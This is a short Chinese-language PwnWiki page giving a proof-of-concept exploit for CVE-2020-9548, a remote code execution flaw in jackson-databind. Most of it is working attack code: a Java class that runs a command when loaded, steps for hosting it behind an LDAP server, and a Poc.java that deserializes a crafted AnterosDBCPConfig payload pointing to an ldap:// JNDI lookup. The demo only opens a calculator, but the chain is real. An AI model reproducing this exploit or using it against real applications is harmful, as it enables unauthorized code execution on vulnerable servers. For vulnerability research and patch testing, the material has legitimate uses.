CVE-2020-9548 jackson-databind RCE漏洞
From PwnWiki
漏洞利用
編譯Exploit.java:
import java.lang.Runtime;
public class Exploit {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (Exception e) {
e.printStackTrace();
}
}
}
搭建HTTP服務 使用Python搭建簡易SimpleHTTPServer服務:
搭建LDAP服務 使用marshalsec來啟動一個LDAP服務:
執行漏洞POC1 Poc.java代碼如下所示:
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String payload = "[\"br.com.anteros.dbcp.AnterosDBCPConfig\", {\"metricRegistry\":\"ldap://127.0.0.1:1099/Exploit\"}]";
try {
mapper.readValue(payload, Object.class);
} catch (IOException e) {
e.printStackTrace();
}
}
}
之後運行該程序,成功執行命令,彈出計算器